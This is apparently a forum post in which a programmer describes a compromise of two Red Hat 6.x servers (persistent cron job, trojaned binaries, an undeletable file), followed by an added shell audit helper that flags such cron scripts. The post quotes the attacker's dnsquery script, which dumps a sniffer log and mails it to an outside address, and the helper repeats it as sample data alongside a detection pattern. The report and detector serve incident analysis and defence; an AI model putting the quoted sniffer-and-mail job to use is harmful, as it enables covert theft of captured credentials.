mjpatlarge
Programmer
Hi folks,
I recently experienced an attack on two older (6.x) Redhat servers and have not been able to find anything on the net that sounds like it (one box did not use OpenSSL so it could not have come in that way) so I thought I would inquire.
Once the attack gets root (not clear how -- could have gone in through bind which was a bit out of date on those machines) it creates a script called dnsquery in cron.daily
which apparently grabs some info with popclean and emails it out:
===========================
#!/bin/sh
cd /usr/lib/
./popclean -r pop.log > test
mail eckosniffer@yahoo.com -s "Sniff $(uname -a)" < test
kill -9 `/sbin/pidof /usr/lib/popclean`
rm -rf test pop.log
A=$PATH
export PATH=/usr/lib/
popclean -w pop.log &
export PATH=$A
=================================
Interestingly enough, that file cannot be deleted or chowned, even by root (although it can be disabled by moving the whole cron.daily directory somewhere else).
Many binaries appear to have been contaminated as well
(I discovered the attack when ls acquired a bash alias it didn't have before), and copying a new binary onto the system seems to automatically contaminate it (i.e. by the time it gets onto the infected system it grows by about 2000 bytes).
Also, once a night a particular address tried to contact it through a binary called sysinit (which appeared in /usr/bin and is 711890 bytes). Not sure how it comes to run, as it does not appear to be cron-ed anywhere.
Anyway, I am getting ready to take both systems up to 8.0 to get rid of the thing, but am curious as to whether this rings any bells with anyone. Thanks for your time.
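Added example, not part of the original post: a small POSIX sh audit helper that flags cron scripts carrying the traits of the dnsquery job quoted above (the sniffer log dump, the mail-out to an external address, the PATH swap into /usr/lib, the kill via pidof) and, where lsattr is available, the immutable attribute that is the usual reason a file cannot be deleted even by root. The pattern list, the function names and the sample cron directory are constructed for this example.

```shell
#!/bin/sh
# Added audit helper, not from the original post or any project: flags cron
# scripts that carry the traits of the dnsquery job quoted above.
# Assumptions: POSIX sh, grep -E, and (optionally) lsattr from e2fsprogs.

# Strings taken from the posted script; a constructed, post-specific list,
# not a general signature set.
SUSPECT_RE='mail [^ ]*@|PATH=/usr/lib|pidof|popclean|pop\.log|sysinit'

# is_suspect_cron_script FILE -> exit 0 (suspect) or 1 (nothing matched);
# prints one line per trait found.
is_suspect_cron_script() {
    f="$1"; hit=1
    # Trait 1: references to the artefacts the post names (sniffer log dump,
    # mail to an external address, PATH swap into /usr/lib, kill via pidof).
    if grep -Eq "$SUSPECT_RE" "$f" 2>/dev/null; then
        echo "SUSPECT $f: $(grep -Eo "$SUSPECT_RE" "$f" | sort -u | tr '\n' ' ')"
        hit=0
    fi
    # Trait 2: immutable attribute, which is what makes a file undeletable
    # even by root; only checked where lsattr exists (chattr -i clears it).
    if command -v lsattr >/dev/null 2>&1 &&
       lsattr -d "$f" 2>/dev/null | awk '{print $1}' | grep -q i; then
        echo "SUSPECT $f: immutable attribute set"
        hit=0
    fi
    return $hit
}

# write_sample_cron_dir DIR: constructed sample tree for offline testing,
# one trimmed copy of the posted job and one benign job.
write_sample_cron_dir() {
    mkdir -p "$1"
    cat > "$1/dnsquery" <<'EOF'
#!/bin/sh
cd /usr/lib/
./popclean -r pop.log > test
mail eckosniffer@yahoo.com -s "Sniff $(uname -a)" < test
kill -9 `/sbin/pidof /usr/lib/popclean`
EOF
    printf '#!/bin/sh\n/usr/sbin/logrotate /etc/logrotate.conf\n' > "$1/logrotate"
}

# Stand-alone demo: audit every script in a constructed cron.daily.
DEMO_DIR=$(mktemp -d) && write_sample_cron_dir "$DEMO_DIR"
for s in "$DEMO_DIR"/*; do is_suspect_cron_script "$s" || echo "ok      $s"; done
rm -rf "$DEMO_DIR"
```

On a real host, point the loop at /etc/cron.daily, /etc/cron.hourly and the other cron directories, and treat any immutable hit as a reason to rebuild rather than clean, since the post also reports contaminated system binaries.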